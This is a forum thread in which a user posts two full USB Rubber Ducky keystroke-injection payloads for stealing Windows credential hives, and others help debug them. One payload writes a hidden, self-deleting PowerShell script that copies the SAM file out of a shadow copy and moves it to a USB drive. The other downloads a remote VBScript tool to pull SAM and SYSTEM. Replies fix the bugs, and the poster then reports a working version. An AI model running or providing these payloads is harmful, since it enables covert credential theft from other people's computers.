shamwow Posted June 21, 2015 Share Posted June 21, 2015 I tried both of the following scripts but they aren't working. Can someone please fix these or provide another way to use Systemshadowcopy? DELAY 1150 GUI r DELAY 1150 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 1150 ALT y DELAY 1150 ENTER ALT SPACE DELAY 1150 STRING m DELAY 1150 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible') ENTER STRING $shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID } ENTER STRING $addSlash = $shadow.DeviceObject + '' ENTER STRING cmd /c mklink C:\shadowcopy $addSlash ENTER STRING Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDir ENTER STRING Remove-Item -recurse -force 'C:\shadowcopy' ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = 'C:\Windows\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING $usbPresent = 'False' ENTER STRING do { ENTER STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'null' } | Measure ENTER STRING if ($present.Count -ge 1){ ENTER STRING $usbPresent = 'True' }Else { ENTER STRING $usbPresent = 'False'}} ENTER STRING until ($usbPresent -eq 'True') ENTER STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'null' } | select Name ENTER STRING move-item c:\Windows\Report.zip $driveLetter.Name ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 1150 STRING C:\Windows\config-e466a.ps1 ENTER DELAY 1150 ALT F4 DELAY 1150 GUI r DELAY 1150 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1150 ALT y DELAY 1150 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 1150 STRING m DELAY 1150 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 1150 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 ENTER DELAY 400 STRING cd <DIRECTORY TO SAVE SAM AND SYSTEM TO> ENTER DELAY 200 STRING copy con download.vbs ENTER STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/"))) ENTER STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send() ENTER STRING If objXMLHTTP.Status = 200 Then ENTER STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open ENTER STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0 ENTER STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a ENTER STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing ENTER STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing ENTER CTRL z ENTER STRING cscript download.vbs http://tools.lanmaster53.com/vssown.vbs ENTER DELAY 800 STRING del download.vbs ENTER DELAY 800 STRING cscript vssown.vbs /start ENTER DELAY 800 STRING cscript vssown.vbs /create ENTER DELAY 800 STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . ENTER DELAY 800 STRING copy \\?\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . ENTER DELAY 800 STRING cscript vssown.vbs /stop ENTER DELAY 800 STRING del vssown.vbs ENTER STRING exit ENTER REM Make sure to change the DIRECTORY above. Quote Link to comment Share on other sites More sharing options...
DragsterPS Posted June 22, 2015 Share Posted June 22, 2015 Hi, I use the first one and it works (Using the twin duck). The only problem I had is that the keyboard layout had errors. This caused the rubber to not write the correct letters. What language are you using? Quote Link to comment Share on other sites More sharing options...
overwraith Posted June 23, 2015 Share Posted June 23, 2015 This caused the rubber to not write the correct letters. ROFL. My mind is now in the gutter. Quote Link to comment Share on other sites More sharing options...
shamwow Posted June 23, 2015 Author Share Posted June 23, 2015 Hi, I use the first one and it works (Using the twin duck). The only problem I had is that the keyboard layout had errors. This caused the rubber to not write the correct letters. What language are you using? I am using english on a us keyboard. For the first script I did not see any sam file in the userprofile directory. Quote Link to comment Share on other sites More sharing options...
shamwow Posted July 4, 2015 Author Share Posted July 4, 2015 i got it to work with the first one. i just had to replace the line with config-e466a.ps1 to config.ps1 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.